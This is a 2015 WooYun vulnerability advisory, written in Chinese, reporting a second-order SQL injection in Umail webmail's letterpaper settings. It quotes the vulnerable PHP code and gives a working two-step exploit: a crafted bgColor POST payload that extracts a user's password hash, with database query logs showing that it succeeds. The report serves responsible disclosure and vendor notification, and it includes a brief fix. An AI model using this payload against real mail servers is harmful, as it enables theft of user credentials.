当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099668

漏洞标题:Umail最新版1处二次注入

相关厂商:Umail

漏洞作者: 玉林嘎

提交时间:2015-03-09 11:48

修复时间:2015-06-11 15:10

公开时间:2015-06-11 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向第三方安全合作伙伴开放
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-17: 细节向普通白帽子公开
2015-05-27: 细节向实习白帽子公开
2015-06-11: 细节向公众公开

简要描述:

rt

详细说明:

win2003 默认安装 最新版
漏洞文件:/client/option/module/o_letterpaper.php

if ( ACTION == "letterpaper-set" )
{
				$url = make_link( "option", "view", "letterpaper" );
				$lp_id = intval( gss( $_POST['id'] ) );
				 .....
				if ( gss( $_POST['padding'] ) )
				{
								$style .= "padding:".gss( $_POST['padding'] ).";";
				}
				else
				{
								$style .= "padding:20px 30px;";
				}
				if ( $lp_id )
				{
								$where = "id='".$lp_id."'";
								$lp_info = $Widget->getone_letterpaper( $where, "*", 0 );
								if ( gss( $_POST['bgImgPath'] ) )
								{
												$suffix = fileext( $_POST['bgImgPath'] );
												check_upload_suffix( $suffix );
												$bgimg = WEBMAIL_URL."resource/images/letterpaper/".$lp_id.".".$suffix;
												$thumb = WEBMAIL_URL."resource/images/letterpaper/thumbnail/".$lp_id.".".$suffix;
												$style .= "background-image:url(".$bgimg.");";
								}
								else if ( !gss( $_POST['bgImgUrl'] ) ) //第一次从这里进入插入注入代码
								{
												$thumb = gss( $_POST['bgColor'] ) ? "background-color:".gss( $_POST['bgColor'] ) : "background-color:#fff";
								}
								else
								{
												$thumb = $lp_info['thumbnail'];  // 第二次进入这里 从上面查询出来的赋予$thumb
												$style .= "background-image:".gss( $_POST['bgImgUrl'] ).";";
								}
								$letterpaper_new = str_replace( "%s", $style, $letterpaper );
								$data = array(
												"letterpaper" => $letterpaper_new,
												"thumbnail" => $thumb
								);
								$where = "id='".$lp_id."'";
								$res = $Widget->update_letterpaper( $data, $where, 0 );//进入更新


第一次更新 我们用于二次注入的代码
xx',`thumbnail`=(SELECT password from userlist where userid=2)#
第二次让它把之前更新的代码重新查询出来 赋予给$thumb 再次进入更新

漏洞证明:

漏洞证明:
需要个umail账号
第一步:
访问http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set
post:id=1&bgColor=xx',`thumbnail`=(SELECT password from userlist where userid=2)#

1.jpg


操作日志:

150305 15:45:38	  195 Connect	umail@localhost on 
		  195 Query	SET NAMES 'UTF8'
		  195 Init DB	umail
		  195 Query	SELECT * FROM letterpaper WHERE id='1' LIMIT 1
		  195 Query	UPDATE letterpaper SET `letterpaper`='<div id="lp_wrap" style="background-color:xx\',`thumbnail`=(SELECT password from userlist where userid=2)#;padding:20px 30px;"><div id="lp_wrap_content"></div></div>',`thumbnail`='background-color:xx\',`thumbnail`=(SELECT password from userlist where userid=2)#' WHERE id='1'
		  195 Quit


第二步:
访问http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set
post:id=1&bgImgUrl=xx

2.png


操作日志:

150305 15:47:41	  196 Connect	umail@localhost on 
		  196 Query	SET NAMES 'UTF8'
		  196 Init DB	umail
		  196 Query	SELECT * FROM letterpaper WHERE id='1' LIMIT 1
		  196 Query	UPDATE letterpaper SET `letterpaper`='<div id="lp_wrap" style="padding:20px 30px;background-image:xx;"><div id="lp_wrap_content"></div></div>',`thumbnail`='background-color:xx',`thumbnail`=(SELECT password from userlist where userid=2)#' WHERE id='1'
		  196 Quit


成功update
最后直接访问http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set
查看源文件

3.png

修复方案:

出库过滤

版权声明:转载请注明来源 玉林嘎@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-13 15:09

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无